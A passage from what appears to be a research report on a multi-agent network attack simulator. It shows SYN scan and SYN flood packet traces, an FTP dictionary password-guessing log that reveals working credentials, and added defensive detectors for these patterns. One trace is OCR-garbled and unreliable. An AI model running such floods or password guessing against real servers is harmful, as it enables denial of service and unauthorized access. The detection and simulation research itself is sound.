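    """(source, target) pairs where the source sent bare SYNs to at least
    `min_ports` distinct ports: the signature of SS/HS style scanning."""
    probed = defaultdict(set)
    for p in packets:
        if p["flags"] == {"SYN"}:
            probed[(p["src"], p["dst"])].add(p["dport"])
    return {pair: sorted(ports) for pair, ports in probed.items() if len(ports) >= min_ports}

def half_open_counts(packets):
    """Per (target, port): SYNs whose 4-tuple never carried a follow-up segment
    from the client (no ACK, no RST), i.e. handshakes left half open."""
    pending = {}                        # 4-tuple -> True until the client follows up
    for p in packets:
        key = (p["src"], p["sport"], p["dst"], p["dport"])
        if p["flags"] == {"SYN"}:
            pending.setdefault(key, True)
        elif key in pending:
            pending[key] = False
    counts = defaultdict(int)
    for (_, _, dst, dport), still_open in pending.items():
        if still_open:
            counts[(dst, dport)] += 1
    return dict(counts)

def syn_flood_targets(packets, threshold=20):
    """Targets with at least `threshold` half-open connections (SYN flood signature)."""
    return {t: n for t, n in half_open_counts(packets).items() if n >= threshold}

# Constructed sample (assumed addresses): a four-port SYN scan from
# 192.168.130.136, then a flood of 25 SYNs from 192.168.128.15, each from a
# fresh source port with a fresh ISN, against port 21 of 192.168.130.135.
SCAN_TRACE = """\
1. 192.168.130.136.1050->192.168.130.135.21 TCP SYN <seq: 12f798 ack: 0>
2. 192.168.130.135.21->192.168.130.136.1050 TCP SYN ACK <seq: 8b6feee8 ack: 12f799>
3. 192.168.130.136.1050->192.168.130.135.21 TCP RST ACK <seq: 12f799 ack: 8b6feee9>
1. 192.168.130.136.1050->192.168.130.135.79 TCP SYN <seq: 12f798 ack: 0>
2. 192.168.130.135.79->192.168.130.136.1050 TCP RST ACK <seq: 0 ack: 12f799>
3. 192.168.130.136.1050->192.168.130.135.79 TCP RST ACK <seq: 12f799 ack: 1>
1. 192.168.130.136.1050->192.168.130.135.80 TCP SYN <seq: 12f798 ack: 0>
2. 192.168.130.135.80->192.168.130.136.1050 TCP SYN ACK <seq: 8b788c3f ack: 12f799>
3. 192.168.130.136.1050->192.168.130.135.80 TCP RST ACK <seq: 12f799 ack: 8b788c40>
1. 192.168.130.136.1050->192.168.130.135.81 TCP SYN <seq: 12f798 ack: 0>
2. 192.168.130.135.81->192.168.130.136.1050 TCP RST ACK <seq: 0 ack: 12f799>
3. 192.168.130.136.1050->192.168.130.135.81 TCP RST ACK <seq: 12f799 ack: 1>
"""
FLOOD_TRACE = "\n".join(
    f"192.168.128.15.{1025 + i}->192.168.130.135.21 TCP SYN <seq: {0x1a9a5 + 0x1337 * i:x} ack: 0>"
    for i in range(25))
SAMPLE = parse_trace(SCAN_TRACE + FLOOD_TRACE)

if __name__ == "__main__":
    print(port_states(SAMPLE, "192.168.130.136", "192.168.130.135"))
    print(syn_scan_sources(SAMPLE))
    print(syn_flood_targets(SAMPLE))
```

The scan detector keys on bare SYNs to many distinct ports from one source, while the flood detector keys on SYNs that are never followed by any client segment on the same 4-tuple. The half-open scan of Fig.2.6.31 never trips the flood detector, because the scanner answers every reply with a RST, whereas the SF stream leaves every handshake pending; conversely the flood source never trips the scan detector, because it hits a single port.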
[Fig.2.6.33 window text ("Shortcut to PORTAL.BAT"), recovered from the screen capture: the last line of
the preceding scan, then the output of the SYN flooding tool, 56 SYN segments from 192.168.128.15
source ports 1025 - 1080 to port 21 of 192.168.130.135, each with a fresh initial sequence number.]

3. 192.168.130.136.1050->192.168.130.135.81 TCP RST ACK <seq: 12f799 ack: 1>
SYN flooding v.1.0
Starting...
192.168.128.15.1025->192.168.130.135.21 TCP SYN <seq: 1a9a5 ack: 0>
192.168.128.15.1026->192.168.130.135.21 TCP SYN <seq: 26372 ack: 0>
192.168.128.15.1027->192.168.130.135.21 TCP SYN <seq: 16d9b ack: 0>
192.168.128.15.1028->192.168.130.135.21 TCP SYN <seq: 24379 ack: 0>
192.168.128.15.1029->192.168.130.135.21 TCP SYN <seq: 25413 ack: 0>
192.168.128.15.1030->192.168.130.135.21 TCP SYN <seq: 15e0a ack: 0>
... (one SYN per source port, continuing through 1079) ...
192.168.128.15.1080->192.168.130.135.21 TCP SYN <seq: 266d3 ack: 0>

Fig.2.6.33. Example of the window showing the attack "SYN flood" (SF) realization at a micro-level

192. 168. 128. 15. 1 08 1->1 92. 168. 130. 135. 21  TCP  SVN  <seq 

dl65  ack:  0> 

192. 168. 128. 15. 108 2->192. 168. 130. 135. 21  TCP  SVN  <seq 

352a  ack:  0> 

192. 168. 128. 15. 108 3->l 92. 168. 130. 135. 21  TCP  SVN  <seq 

If 30b  ack:  0> 

192. 168. 128. 15. 1084- >192. 168. 130. 135. 21  TCP  SVN  (seq 

lc2cd  ack:  0> 

192. 168. 128. 15. 108 5->192. 168. 130. 135. 21  TCP  SVN  <seq 

la87e  ack:  0> 

192. 168. 128. 15. 108 6->192. 168. 130. 135. 21  TCP  SVN  <seq 

le50f  ack:  0> 

192. 168. 128. 15. 108 7->l 92. 168. 130. 135. 21  TCP  SVN  <seq 

1612f  ack:  0> 

192. 168. 128. 15. 108 8->l 92. 168. 130. 135. 21  TCP  SVN  <seq 

12746  ack:  0> 

192. 168. 128. 15. 108 9->192. 168. 130. 135. 21  TCP  SVN  <seq 

If 5c7  ack:  0>  ZJ 

Fig.2.6.33.  Example  of  the  window  showing  the  attack  “SYN  flood”  (SF)  realization  at  a  micro-level 
Fig.2.6.34. Example of the window showing the realization of the intention “Escalating Privilege” (EP) scenario
at a macro-level and a call of the “Password Cracking” (PC) attack action


Examples of the screens displaying the generation of the attack “Password Cracking” (PC) are
depicted in Fig.2.6.34 and Fig.2.6.35.

A fragment of the intention “Escalating Privilege” (EP) scenario at a macro-level and the call of
the attack “Password Cracking” (PC) is shown in Fig.2.6.34.

An example of the window showing the realization of the attack “Password Cracking” (PC) at a
micro-level is represented in Fig.2.6.35.

The logs of attack traces produced in the experiments carried out at a micro-level are recorded in
Appendix A4.2.

Fragments of logs for port scanning are presented in paragraph A4.2.1, fragments of logs for SYN
flood in paragraph A4.2.2, and fragments of logs for password guessing (cracking) in paragraph
A4.2.3.
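The micro-level SYN flood trace in Fig.2.6.33 has a recognizable shape from the defender's side: one source walks through consecutive source ports, every packet is a bare SYN with ack 0, and no port ever completes a handshake. The following is an added example, not code from the report or the Attack Simulator, that parses trace lines in the format of that window and flags such flows; the line format, the `threshold` parameter and the sample trace are assumptions constructed for the example.

```python
import re
from collections import defaultdict

# Added example (not from the report): parse trace lines in the format of the
# SYN flood window in Fig. 2.6.33 and flag sources that leave many half-open
# connection attempts against one destination port, e.g.
#   192.168.128.15.1032->192.168.130.135.21 TCP SYN <seq 214b2 ack: 0>
LINE_RE = re.compile(
    r"^(?P<src>\d{1,3}(?:\.\d{1,3}){3})\.(?P<sport>\d+)->"
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3})\.(?P<dport>\d+)\s+TCP\s+(?P<flags>[A-Z|]+)"
    r"\s+<seq\s+(?P<seq>[0-9a-fA-F]+)\s+ack:\s+(?P<ack>[0-9a-fA-F]+)>$"
)


def parse_line(line):
    """Return a dict for one trace line, or None if the line is not in the expected format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "src": m["src"], "sport": int(m["sport"]),
        "dst": m["dst"], "dport": int(m["dport"]),
        "flags": m["flags"],
        # sequence and acknowledgement numbers are printed in hexadecimal
        "seq": int(m["seq"], 16), "ack": int(m["ack"], 16),
    }


def detect_syn_flood(lines, threshold=20):
    """Group packets by (src, dst, dport). A source port that sent a bare SYN
    (ack 0) and never followed it with an ACK is a half-open attempt. Flows
    with at least `threshold` half-open attempts are returned with counts."""
    syns = defaultdict(set)       # flow -> source ports that sent a bare SYN
    completed = defaultdict(set)  # flow -> source ports that later sent an ACK
    for line in lines:
        pkt = parse_line(line)
        if pkt is None:
            continue
        flow = (pkt["src"], pkt["dst"], pkt["dport"])
        if pkt["flags"] == "SYN" and pkt["ack"] == 0:
            syns[flow].add(pkt["sport"])
        elif "ACK" in pkt["flags"]:
            completed[flow].add(pkt["sport"])
    alerts = {}
    for flow, ports in syns.items():
        half_open = ports - completed[flow]
        if len(half_open) >= threshold:
            alerts[flow] = {"half_open": len(half_open),
                            "ports": (min(half_open), max(half_open))}
    return alerts


def make_sample_trace():
    """Constructed sample, not the report's capture: 25 bare SYNs from one host
    walking source ports 1031 upward (the pattern of Fig. 2.6.33), plus one
    normal SYN/ACK pair from another host that must not be flagged."""
    lines = []
    seq = 0x1F590
    for i in range(25):
        seq = (seq * 1103515245 + 12345) & 0xFFFFF  # pseudo-random-looking sequence numbers
        lines.append(f"192.168.128.15.{1031 + i}->192.168.130.135.21 TCP SYN <seq {seq:x} ack: 0>")
    lines.append("192.168.128.20.2000->192.168.130.135.21 TCP SYN <seq 1a2b3 ack: 0>")
    lines.append("192.168.128.20.2000->192.168.130.135.21 TCP ACK <seq 1a2b4 ack: 5c0d1>")
    return lines


if __name__ == "__main__":
    for flow, info in detect_syn_flood(make_sample_trace()).items():
        print(f"possible SYN flood: {flow[0]} -> {flow[1]}:{flow[2]}, "
              f"{info['half_open']} half-open attempts from ports {info['ports']}")
```

The check keys on half-open attempts rather than on raw SYN counts, so a busy but legitimate client that completes its handshakes does not trip the threshold; on a real sensor the grouping would additionally be bounded by a time window.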
Connecting...
Send: connecting to 192.168.130.135.21
Reply: 220 Serv-U FTP Server v4.1 for WinSock ready...
Send: USER enan
Reply: 331 User name okay, need password.
Send: PASS Aberdeen
Reply: 530 Not logged in.
Bad password!

Connecting...
Send: connecting to 192.168.130.135.21
Reply: 220 Serv-U FTP Server v4.1 for WinSock ready...
Send: USER enan
Reply: 331 User name okay, need password.
Send: PASS Abernathy
Reply: 530 Not logged in.
Bad password!

Connecting...
Send: connecting to 192.168.130.135.21
Reply: 220 Serv-U FTP Server v4.1 for WinSock ready...
Send: USER enan
Reply: 331 User name okay, need password.
Send: PASS Abidjan
Reply: 530 Not logged in.
Bad password!

Connecting...
Send: connecting to 192.168.130.135.21
Reply: 220 Serv-U FTP Server v4.1 for WinSock ready...
Send: USER enan
Reply: 331 User name okay, need password.
Send: PASS Abigail
Reply: 530 Not logged in.
Bad password!

Connecting...
Send: connecting to 192.168.130.135.21
Reply: 220 Serv-U FTP Server v4.1 for WinSock ready...
Send: USER enan
Reply: 331 User name okay, need password.
Send: PASS Abner
Reply: 530 Not logged in.
Bad password!

Connecting...
Send: connecting to 192.168.130.135.21
Reply: 220 Serv-U FTP Server v4.1 for WinSock ready...
Send: USER enan
Reply: 331 User name okay, need password.
Send: PASS Abo
Reply: 530 Not logged in.
Bad password!

Connecting...
Send: connecting to 192.168.130.135.21
Reply: 220 Serv-U FTP Server v4.1 for WinSock ready...
Send: USER enan
Reply: 331 User name okay, need password.
Send: PASS enan
Reply: 230 User logged in, proceed.

SUCCESS! Use this account and password for access to ftp-server:
USERNAME: enan
PASSWD: enan

Fig.2.6.35.  Example  of  the  window  showing  the  attack  “Password  Cracking”  (PC)  realization  at  a  micro-level 
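Seen from the FTP server, the session in Fig.2.6.35 is a run of 530 replies for the same user name followed by a 230, which is exactly the pattern a lockout or alerting rule should catch before the guess that succeeds. The block below is an added example, not code from the report or the Attack Simulator; it reads a transcript in the Send:/Reply: layout of that window and counts consecutive failures per user. The `max_failures` threshold, the user name "guest" and the password placeholders in the sample are constructed for the example.

```python
import re

# Added example (not from the report): audit an FTP transcript in the
# Send:/Reply: format of Fig. 2.6.35 and count 530 (login failed) replies per
# user name so that a lockout/alert can fire before a guess succeeds.
USER_RE = re.compile(r"^Send:\s+USER\s+(\S+)$")
REPLY_RE = re.compile(r"^Reply:\s+(\d{3})\b")


def audit_ftp_transcript(lines, max_failures=5):
    """Return per-user statistics: how many 530 replies were seen, whether a
    230 (logged in) reply followed, and the failure count at which the number
    of failures first reached `max_failures` (None if it never did)."""
    stats = {}
    current_user = None
    for raw in lines:
        line = raw.strip()
        m = USER_RE.match(line)
        if m:
            current_user = m.group(1)
            stats.setdefault(current_user,
                             {"failures": 0, "succeeded": False, "alert_at": None})
            continue
        m = REPLY_RE.match(line)
        if not m or current_user is None:
            continue
        code = m.group(1)
        entry = stats[current_user]
        if code == "530":
            entry["failures"] += 1
            if entry["alert_at"] is None and entry["failures"] >= max_failures:
                entry["alert_at"] = entry["failures"]
        elif code == "230":
            entry["succeeded"] = True
    return stats


def flag_users(stats):
    """User names whose failure count reached the alert threshold."""
    return sorted(user for user, entry in stats.items() if entry["alert_at"] is not None)


def make_sample_transcript():
    """Constructed transcript (not the report's window): six wrong passwords
    for user 'enan' and then a successful login, plus one failed attempt for a
    second user that must not be flagged. Password values are placeholders."""
    lines = []
    for i in range(1, 8):
        lines += [
            "Connecting...",
            "Send: connecting to 192.168.130.135.21",
            "Reply: 220 Serv-U FTP Server v4.1 for WinSock ready...",
            "Send: USER enan",
            "Reply: 331 User name okay, need password.",
            f"Send: PASS guess{i}",
            "Reply: 530 Not logged in." if i < 7 else "Reply: 230 User logged in, proceed.",
        ]
    lines += [
        "Send: USER guest",
        "Reply: 331 User name okay, need password.",
        "Send: PASS guess1",
        "Reply: 530 Not logged in.",
    ]
    return lines


if __name__ == "__main__":
    stats = audit_ftp_transcript(make_sample_transcript())
    for user in flag_users(stats):
        e = stats[user]
        print(f"{user}: alert after {e['alert_at']} failures, "
              f"{e['failures']} total, login succeeded: {e['succeeded']}")
```

With the default threshold the alert for "enan" fires on the fifth 530, one attempt before the 230 that ends the session in the figure; a server-side lockout at that point would have stopped the guessing run.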


2.7.  Conclusion 

The second chapter describes the architecture of the Attack Simulator prototype, its functional
capabilities and implementation peculiarities, and sketches the results of the simulation-based
exploration of the developed Attack Simulator prototype.

The main conclusions concerning the Attack Simulator prototype and the results of its evaluation are
as follows:

1. The software prototype for computer network attack simulation is built as a multi-agent system
that uses two classes of agents: (1) “Network Agent” and (2) “Hacker Agent”. The Network Agent
simulates the defensive system of the attacked computer network, and the Hacker Agent simulates a hacker
performing an attack against the computer network. In the developed prototype each agent class has a single
instance, although the developed technology makes it possible to model and simulate a team of hackers
and a team of agents responsible for computer network security.

2. The Attack Simulator is implemented on the basis of the technology supported by the Multi-Agent
System Development Kit (MASDK), a multi-agent platform aimed at supporting the design and
implementation of multi-agent systems [Gorodetski et al. 02a]. The developed and implemented
simulator comprises a multitude of reusable components generated by use of the MASDK standard
functionalities and application-oriented software components developed manually in the
programming language MS Visual C++ 6.0 SP 5.

3. Each agent operates using the respective fragment of the application ontology. The interaction
between agents in the process of attack simulation is supported by the communication component. An
advantage of such a knowledge representation is that it makes it possible to simulate adversary
interactions. In such a model, while simulating an attack, the Hacker Agent sends a certain message to the
Network Agent. The Network Agent, as happens in real-life interactions, analyzes the
received message and forms a response message. This message is formed by use of the
Network Agent's knowledge base, which models the network configuration, information about possible
attacks, and the reaction of the network to them.

4. The behaviors of both the Hacker Agent and the Network Agent are specified on the basis of
state-machine models, which interpret the agents' behavior specified formally within the formal grammar
framework. The Hacker Agent acts on the basis of a family of nested state machines. The state
machine model of the Network Agent is represented by a single state machine. It determines states,
transitions from state to state, and the conditions for such transitions. Each state represents actions that
should be carried out when the state machine transits into that state. These actions are initiated after
the states of the state machines are processed. Actions are represented in terms of scripts of the
MASDK Script Language.

5. A detailed specification of all notions, their attributes, and the values of the attributes used in the
Attack Simulator has been realized in the application domain ontology component. The ontology is
filled in during the design stage using the MASDK Ontology Editor. Classes, class attributes,
and meta-classes that unify classes into groups are entered and modified through the ontology editor's
user interface. The general notions of the application domain ontology are as follows:

• Appl serves to store the names of applications running on the attacked host;

• Attack ensures communication between the agents MainHack and MainNet;

• Attacks determines the knowledge of the agent MainNet about network attacks;

• DNS1, DNS2, Domain, DomLink and DomHost define information about the network domain,
mail servers and hosts;

• Firewall, ForbiddenLocalAddr and ForbiddenRemoteAddr determine the firewalls' data;

• Host serves to store detailed information about hosts (domain name, IP address, OS version,
type and platform, etc.);

• KnownLANs determines the hacker's knowledge about networks;

• LAN determines the network's knowledge of itself;

• Log and LogResult store the attack route in terms of state machines and the obtained results;

• Objective describes the malefactor's intention being implemented;

• Objectives stores descriptions of all intentions of the attacker realized in the prototype;

• Security, Service, SharedRes, TrusHosts and User keep information about hosts' security
parameters, resources and users;

• Step stores data on the current step of state machines.

6. The Hacker Agent comprises the following main components:

• Hacker Agent Kernel contains the functions needed for exploiting the ontology, running state
machines, defining the attack task specification, computing the next state-machine transition, and
initiating the visualization of attack development;

• Fragment of the application domain ontology specifies a set of notions and attributes used by
the Hacker Agent;

• State machines model component is used for the specification of the Hacker Agent behavior;

• Scripts component specifies the set of scripts that can be performed by the Hacker Agent's
state machines;

• Attack task specification component provides the user with the interface needed to specify attack
attributes;

• Probabilistic decision-making model is used to determine the Hacker Agent's further actions in
attack generation;

• Network traffic generator is used to form the flow of network packets for several classes of
attacks directed at the hosts according to the attack specification;

• Visualization component of the attack scenario development is used for the visual representation
of the attack progress, corresponding to each action of the attacker and the respective response of the
Network Agent.

7. The main components of the Network Agent are as follows:

• Network Agent Kernel contains functions for processing the application domain ontology and
the state machine model, specifying the network configuration, initializing the firewall model, and
computing the network's response to an attacking action;

• Fragment of the application domain ontology determines a set of notions and attributes used
by the Network Agent;

• State machines model component specifies the actions corresponding to the reception of an incoming
message, its classification and processing, and the sending of the response;

• Scripts component specifies a set of scripts initiated from the state machine model of the
Network Agent;

• Network configuration specification component provides a set of user interfaces
for the description and configuration of the network to be attacked;

• Firewall model component is used to determine the firewall's response to the action generated
by the Hacker Agent;

• Generator of the network's response is used for the generation of the network's and hosts'
responses (messages) to attack actions.

8. The main objective of the experiments conducted was to demonstrate the efficacy of the Attack Simulator
prototype for accomplishing various attack scenarios against networks with different
structures and security policies implemented. The following practically interesting tasks are
considered by the authors as potential opportunities provided by the developed Attack Simulator
prototype:

• Checking a computer network security policy at the stages of conceptual and logical design of the
network security system. This task can be solved by simulation of attacks at a macro-level and
investigation of the responses of the network model being designed (analyzed);

• Checking the security policy of a real-life computer network. This task can be solved by means of
simulation of attacks at a micro-level, i.e. by generating network traffic corresponding to the real
activity of malefactors realizing various security threats.

This is the justification of the two classes of experiments that have been carried out with the Attack
Simulator prototype:

• Experiments with simulation of attacks at a macro-level. In these experiments, generation and
investigation of malicious actions against a computer network model were carried out;

• Experiments with simulation of attacks at a micro-level. In these experiments, generation of
malicious network traffic against a real computer network was carried out.

9. In the experiments with simulation of attacks at a macro-level, explorations of attacks for all
implemented malefactor's intentions have been accomplished. These experiments were carried out for
various parameters of the attack task specification and of the attacked computer network configuration.
Besides the malefactor's intention, the influence on attack efficacy of the following input parameters was
investigated: protection degree of the network and personal firewalls, protection degree of the attacked
host (for example, how strong the password is, whether the host shares files, printers and other
resources, whether the host uses trusted hosts, etc.), and the degree of the hacker's knowledge about the network. To
investigate the Attack Simulator capabilities, the following parameters of the attack realization outcome
have been selected: number of terminal-level attack actions, percentage of the hacker's intentions
realized successfully, percentage of “successful” network responses to attack actions, percentage of
attack actions blocked by the firewall, and percentage of “ineffective” results of attack actions (when the attack
is not successful). In all experiments the Attack Simulator allowed generating clearly interpretable
results.

10. Taking into account the limitation of the Report space, the results of experiments at a macro-level
have been described in detail only for two classes of intentions belonging to each of the high-level intentions Reconnaissance (R)
and Implantation and threat realization (I). For the high-level intention R,
the results of experiments for the intentions Identification of the host Services (IS) and Applications and
Banners Enumeration (ABE) have been presented. For the high-level intention I, the results of
experiments for the intentions Gaining Access to Resources (GAR) and Confidentiality Violation
Realization (CVR) have been considered.

When carrying out the attacks realizing the intentions IS and ABE, it was supposed that the network firewall
can protect the attacked network with “Strong”, “Medium” and “None” degrees of defense, depending on the
completeness of the list of terminal-level attacks that can be recognized by the firewall. For the intentions IS and
ABE, the plots of the dependencies of the attack outcome parameters on the network firewall
protection degree have been built.

When fulfilling the attacks realizing the intentions GAR and CVR, attacks were carried out under the
following varying conditions: (1) for two values of the protection degree of the network firewall (1 -
“Strong”; 2 - “None”); (2) for two values of the protection degree of the personal firewall (1 - “Strong”; 2 -
“None”); (3) for two values of the protection degree of the parameters of the attacked host (1 - “Strong”; 2 -
“Weak”); and (4) for two values of the level of the hacker's knowledge about the network (1 - “Good”; 2 -
“Nothing”). For the intentions GAR and CVR, the plots of the dependencies of the attack outcome parameters
on the various input parameters have been constructed.

11. In the current version of the prototype, network traffic generation is implemented only for
certain network attacks. Those attacks are selected from different classes of attacks and (or)
malefactors' intentions specified in the application domain ontology. The authors have not set
themselves the task of implementing all attack actions at the lower level. The main emphasis has been placed on
developing the general approach to generating network traffic by use of the attack simulator
prototype and on assessing its feasibility and effectiveness.

For the evaluation of the efficacy of the Attack Simulator prototype at a micro-level, the network
packets for the attack classes “Port scanning”, “Denial of service”, and “Password Guessing” have
been generated. The network model used in the experiments with the Attack Simulator corresponded to a
real computer network against which attacks at a micro-level were carried out.
General Conclusion of the Project

This Report gives a summary of the results presented in previous reports and summarizes the
results of the fourth phase of the research, which, in general, supposes the development of the software
prototype of the Attack Simulator implementing the theoretical results of the research, and its evaluation.

The main conclusions resulting from the research presented in the Report are as follows.

• The main peculiarities of the developed approach to computer network attack modeling
and simulation are (1) malefactor's intention-centric and target-oriented attack modeling and
simulation, (2) multi-level attack specification in the sequence (from upper to lower levels)
“attack task (goal) and attack object → structured malefactor's intentions → malefactor's
actions → attacked network response”, (3) ontology-based attack model structuring, (4)
attributed stochastic context-free grammar for the formal specification of attack scenarios and their
components (“simple attacks”) and the use of the formal grammar substitution operation for the
specification of the multi-level structure of attacks, (5) state machine-based implementation of the formal grammar
framework, and (6) on-line generation of the malefactor's activity resulting from
the reaction of the attacked network security system.

• The software prototype of the Attack Simulator is built as a multi-agent system consisting of
two classes of agents (Hacker Agent and Network Agent), whose activity is based on the
“Attacks against computer network” application ontology and a communication component.
The Hacker Agent simulates a hacker performing an attack against a computer network. The
Network Agent simulates the defense system of the attacked computer network. Each agent
operates using the respective fragment of the application ontology. The interaction between
agents in the process of attack simulation is supported by the communication component. The
developed and implemented simulator comprises a multitude of reusable components
generated by use of the Multi-Agent System Development Kit (MASDK) standard
functionalities and application-oriented software components developed manually in the
programming language MS Visual C++ 6.0. The developed technology makes it possible to
simulate in the future the adversary interactions of a team of hackers and a team of network
defense agents.

• Two types of experiments have been carried out with the Attack Simulator prototype: (1)
simulation of attacks at a macro-level, in which generation and investigation of
malicious actions against a computer network model have been carried out; (2) simulation of
attacks at a micro-level, in which generation of malicious network traffic against a
real computer network has been performed. The simulation-based exploration of the developed
Attack Simulator prototype has demonstrated its efficacy for accomplishing various attack
scenarios against networks with different structures and security policies implemented.

• The further development of the computer network attack modeling software prototype can
consist of enlarging the capabilities of attack task specification, expanding the
attack classes, supporting more complicated structures of the attacked networks,
implementing more sophisticated attack scenarios on a real network using different attack
objects and exploits, evolving the attack modeling system into a team of hacker agents that
collectively realize coordinated distributed attacks, and others.

The  above  results  cover  all  the  tasks  scheduled  within  the  Task  1  of  the  Project  #1994P. 
Appendix 1. Examples of the state machines of the Hacker Agent operation


I. State machine A (Network attack)

1. Identifier of the node to which the state machine corresponds. (1)

2. State machine diagram.

3. Main parameters of the state machine.

State machine name: A
Relevant intentions: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12
States: R, I, End
First state: R
Nonterminal states: R, I
Terminal states: -
Auxiliary states: -

4. Parameters of transitions.

5. Transition conditions. Absent.

6. Scripts.

Script of the agent “Hacker” behaviour in the state A of the state machine A

Entry action (A_INIT_Entry):
IF Objective.Exist(Flag = "1") THEN Objective.Update(Flag = ""); ENDIF;
CALLSCRIPT( Attack_Assign_Do );
tmpLog.Create();
tmpLog_A = ""; tmpLog_C = ""; tmpLog_S = "";
tmpLog_ResultComment = ""; tmpLog_Type = ""; tmpLog_DebugInfo = "";
tmpLog_R = ""; tmpLog_Description = "";
EXECSQL( Delete From Log );
EXECSQL( Delete From LogResult );
EXECSQL( Delete From Host );
EXECSQL( Delete From Appl );
EXECSQL( Delete From DomLink );
EXECSQL( Delete From Security );
EXECSQL( Delete From Service );
EXECSQL( Delete From SharedRes );
EXECSQL( Delete From Step );
EXECSQL( Delete From TrusHosts );
EXECSQL( Delete From User );
EXECSQL( Delete From DNS1 );
EXECSQL( Delete From DNS2 );
EXECSQL( Delete From Domain );
EXECSQL( Delete From DomHost );
_InitAtLogView();

Do action:
_InitDB();

Transitions (Condition / Next state / Action): none

Exit action: none

Script of the agent “Hacker” behaviour in the state R of the state machine A

Entry action (A_R_Entry):
Log.Create();
Log.A = "A";
Log.S = "I";
Log.Description = "RECONNAISSANCE";
Log.DebugInfo = "A => R";
Log.C = "Nonterminal_State_2";
Log.Type = 2;
AUTO( R );

Do action (A_R_Do):
Step.xState = "R";
Step.Condition = 0;
CALLSCRIPT( Do_script );

Transitions (Condition / Next state / Action):
Step.yState = "R"   / R
Step.yState = "I"   / I
Step.yState = "End" / End

Exit action: none


Script of the agent “Hacker” behaviour in the state I of the state machine A

Entry action (A_I_Entry):
Log.Create(); Log.A = "A"; Log.S = "I";
Log.Description = "IMPLANTATION AND THREAT REALIZATION";
Log.DebugInfo = "A => I";
Log.C = "Nonterminal_State_3";
Log.Type = 2;
AUTO( I );

Do action (A_I_Do):
Step.xState = "I";
Step.Condition = 0;
CALLSCRIPT( Do_script );

Transitions (Condition / Next state / Action):
Script of the agent “Hacker” behaviour in the state End of the state machine A

Entry action: none

Do action (A_End_Do):
Log.Create();
Log.A = "RRM";
Log.S = "END";
Log.Type = 10;
Log.Description = "ATTACK IS OVER !!!";
_UpdateAtLogView();

Transitions (Condition / Next state / Action): none

Exit action: none


Common script of next state selection

Entry action: none

Do action (Do_Script):
Step.Objective = Objective.ObjID;
Step.SMname = ClassAuto;
TransitionSelect( Step.Objective, Step.SMname, Step.xState, Step.Condition, Step.yState );
_UpdateAtLogView();

Transitions (Condition / Next state / Action): none

Exit action: none


Common script for the notion “Attack” cleaning

Entry action: none

Do action (Attack_Erase_Do):
Attack_Name = ""; Attack_HackerIP = ""; Attack_ip = "";
Attack_Class = ""; Attack_IsNet = 0; Attack_Port = "";
Attack_SubClass0 = ""; Attack_SubClass1 = ""; Attack_SubClass2 = "";
Attack_OSplatform = ""; Attack_OStype = ""; Attack_OSversion = ""; Attack_Message = "";
Attack_SharedRes = ""; Attack_DomLink = ""; Attack_DomainControl = "";
Attack_DomainName = ""; Attack_UserID = ""; Attack_UserSID = ""; Attack_UserPsw = "";
Attack_Appl = ""; Attack_DNS1HostName = ""; Attack_DNS2Post = ""; Attack_SysTime = "";
Attack_Mask = ""; Attack_DNS2DomName = ""; Attack_DNS1HostIP = "";
Attack_TrusHost = ""; Attack_IsInNet = 0;

Transitions (Condition / Next state / Action): none

Exit action: none


Common script for defining the basic attributes of the notion “Attack”

Entry action: none

Do action (Attack_Assign_Do):
Attack_HackerIP = Objective_OwnIP; Attack_IsNet = Objective_Net;
Attack_ip = Objective_Host;

Transitions (Condition / Next state / Action): none

Exit action: none


II. State machine R (Reconnaissance)

1. Identifier of the node to which the state machine corresponds. (11)

2. State machine diagram.

3. Main parameters of the state machine.

State machine name: R
Relevant intentions: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12
States: R1, IH, IS, IO, CI, RE, UE, ABE, End
First state: R1
Nonterminal states: IH, IS, IO, CI, RE, UE, ABE
Terminal states: -
Auxiliary states: R1

4. Parameters of transitions.
Rows 1 to 5 of the table are not present in the extracted text. Each row gives the row number, the source state, the Do and Entry scripts of the source state (where the row introduces the state), the target state, and twelve weights, one per relevant intention 1 to 12.

No. | From | Do script | Entry script | To  |  1  |  2  |  3  |  4  |  5  |  6  |  7   |  8   |  9   |  10  |  11  |  12
 6  | R1   |           |              | IO  |  0  |  0  |  0  |  0  |  0  |  0  | 0.16 | 0.16 | 0.16 | 0.16 | 0.16 | 0.16
 7  | R1   |           |              | RE  |  0  |  0  |  0  |  1  |  0  |  0  |  0   |  0   |  0   |  0   |  0   |  0
 8  | R1   |           |              | UE  |  0  |  0  |  0  |  0  |  1  |  0  |  0   |  0   |  0   |  0   |  0   |  0
 9  | R1   |           |              | ABE |  0  |  0  |  0  |  0  |  0  |  1  |  0   |  0   |  0   |  0   |  0   |  0
10  | IH   | R_IH_Do   | R_IH_Entry   | IH  | 0.7 |  0  |  0  |  0  |  0  |  0  |  0   |  0   |  0   |  0   |  0   |  0
11  | IH   |           |              | IS  |  0  |  0  |  0  |  0  |  0  |  0  | 0.6  | 0.6  | 0.6  | 0.6  | 0.6  | 0.6
12  | IH   |           |              | IO  |  0  |  0  |  0  |  0  |  0  |  0  | 0.4  | 0.4  | 0.4  | 0.4  | 0.4  | 0.4
13  | IH   |           |              | End | 0.3 |  0  |  0  |  0  |  0  |  0  |  0   |  0   |  0   |  0   |  0   |  0
14  | IS   | R_IS_Do   | R_IS_Entry   | IS  |  0  | 0.7 |  0  |  0  |  0  |  0  |  0   |  0   |  0   |  0   |  0   |  0
15  | IS   |           |              | IO  |  0  |  0  |  0  |  0  |  0  |  0  |  1   |  1   |  1   |  1   |  1   |  1
16  | IS   |           |              | End |  0  | 0.3 |  0  |  0  |  0  |  0  |  0   |  0   |  0   |  0   |  0   |  0
17  | IO   | R_IO_Do   | R_IO_Entry   | IO  |  0  |  0  | 0.7 |  0  |  0  |  0  |  0   |  0   |  0   |  0   |  0   |  0
18  | IO   |           |              | CI  |  0  |  0  |  0  |  0  |  0  |  0  |  1   |  1   |  1   |  1   |  1   |  1
19  | IO   |           |              | End |  0  |  0  | 0.3 |  0  |  0  |  0  |  0   |  0   |  0   |  0   |  0   |  0
20  | CI   |           |              | RE  |  0  |  0  |  0  |  0  |  0  |  0  |  1   |  1   |  1   |  1   |  1   |  1
21  | RE   | R_RE_Do   | R_RE_Entry   | RE  |  0  |  0  |  0  | 0.7 |  0  |  0  |  0   |  0   |  0   |  0   |  0   |  0
